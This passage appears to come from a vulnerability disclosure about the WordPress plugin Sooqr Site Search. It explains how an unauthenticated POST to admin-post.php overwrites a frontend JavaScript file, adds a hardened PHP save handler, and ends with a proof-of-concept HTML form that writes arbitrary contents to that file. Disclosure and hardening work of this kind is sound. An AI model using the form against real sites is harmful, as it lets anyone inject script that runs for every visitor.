That allows the function to be run when accessing an admin page, which doesn’t require that someone be logged in to access it. That is a common starting point for vulnerabilities, including exploited vulnerabilities, so any function that runs then is something we check during the security reviews we do of plugins.
When that function runs, if the POST input “snippetjs” exists, what is submitted as its value is saved to the file /wp-content/plugins/sooqr-site-search/public/js/sooqrsearch.js.
If the plugin’s functionality is enabled, that file will be loaded when visiting frontend pages of the website.
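As an added example (not the plugin's code and not a patch from its developer), this is one way a save handler for that input can refuse requests that do not come from a logged-in administrator with a valid nonce. The function name, the nonce action and field, the size limit and the use of the admin_init hook are assumptions; only the “snippetjs” input and the target file path come from this post.

```php
<?php
// Added example. Hypothetical names: example_sooqr_save_snippet,
// example_sooqr_nonce. The hook is an assumption about how the handler runs.
add_action( 'admin_init', 'example_sooqr_save_snippet' );

function example_sooqr_save_snippet() {
	// Only act on a submission of the snippet form.
	if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['snippetjs'] ) ) {
		return;
	}

	// admin_init also fires for logged-out requests to admin-post.php, so
	// reaching this point says nothing about who sent the request.
	// The value is JavaScript served to every visitor, so also require
	// unfiltered_html, which site admins lack by default on multisite.
	if ( ! current_user_can( 'manage_options' ) || ! current_user_can( 'unfiltered_html' ) ) {
		wp_die( 'You are not allowed to change this setting.', '', array( 'response' => 403 ) );
	}

	// A logged-in admin's browser can still be made to submit a cross-site
	// form, so require a nonce. The settings form has to emit it with:
	// wp_nonce_field( 'example_sooqr_save_snippet', 'example_sooqr_nonce' );
	check_admin_referer( 'example_sooqr_save_snippet', 'example_sooqr_nonce' );

	// Reject array input and oversized bodies before touching the disk.
	// The 64 KB limit is an assumed value for this example.
	if ( ! is_string( $_POST['snippetjs'] ) || strlen( $_POST['snippetjs'] ) > 65536 ) {
		wp_die( 'Invalid snippet.', '', array( 'response' => 400 ) );
	}
	$snippet = wp_unslash( $_POST['snippetjs'] );

	// Fixed destination: no part of the path is taken from the request.
	$target = WP_PLUGIN_DIR . '/sooqr-site-search/public/js/sooqrsearch.js';
	if ( false === file_put_contents( $target, $snippet, LOCK_EX ) ) {
		wp_die( 'Could not write the snippet file.', '', array( 'response' => 500 ) );
	}
}
```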
Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior, we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that since a previously full disclosed vulnerability was quickly on hackers’ radar, but it appears those moderators have such disdain for the rest of the WordPress community that their continued ability to act inappropriately is more important than what is best for the rest of the community.
Proof of Concept
The following proof of concept will save the specified user input to the file /wp-content/plugins/sooqr-site-search/public/js/sooqrsearch.js.
Make sure to replace “[path to WordPress]” with the location of WordPress and “[file contents]” with the contents to be placed in the file.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php" method="POST">
<input type="hidden" name="snippetjs" value="[file contents]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>